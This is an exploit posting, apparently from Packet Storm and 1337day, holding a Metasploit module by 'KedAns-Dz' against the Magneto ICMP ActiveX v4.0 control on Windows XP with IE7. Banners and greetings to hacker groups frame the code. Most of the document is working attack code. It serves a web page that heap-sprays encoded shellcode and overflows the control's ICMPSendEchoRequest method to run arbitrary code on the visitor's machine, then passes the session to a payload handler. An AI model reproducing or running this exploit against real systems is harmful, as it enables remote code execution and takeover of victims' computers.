KedAns-DzPACKETSTORM:102122
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Magneto ICMP ActiveX v4.0 (SendEchoRequest) Remote Code Execute (meta)
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Code Execute (via MetaSploit3)
# Tested on : [Windows XP SP3 Fr]
##
# Download : [http://www.magnetosoft.com/downloads/skicmp_setup.exe]
##
# $Id: $ micmp_ocx_rce.rb | 08/06/2011 00:34 | KedAns-Dz $
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute',
'Description' => %q{
This module exploits a Remote Code Execute in Magneto ICMP ActiveX Control (OCX)
Vesion v4.0.0.20 , an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'boahat', # Original
'KedAns-Dz <ked-h[at]hotmail.com>' # MSF Module
],
'Version' => 'Version 1.0',
'References' =>
[
[ 'URL', 'http://exploit-db.com/exploits/17328' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
'DisableNops' => 'True',
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ESI',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 (Fr) / IE7', { 'ret' => '' } ],
],
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
clsID = "3A86F1F2-4921-4C75-AF2C-A1AA241E12BA" # ClassID
vname = rand_text_alpha_upper(11) # T4rG3T.n4m3 ^
shell = payload.encoded # ShellCode (Encoded)
# Build the HTML Exploit
content = %Q|<html>
<body>
<object classid="clsid:#{clsID}" id="#{vname}"></object>
<script>
var shellcode = "#{shell}";
var bigblock = unescape("%u0c0c%u0c0c");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<500; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 6000)
buffer+= "\x0c\x0c\x0c\x0c";
#{vname}.ICMPSendEchoRequest(buffer);
</script>
</body>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
end
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================`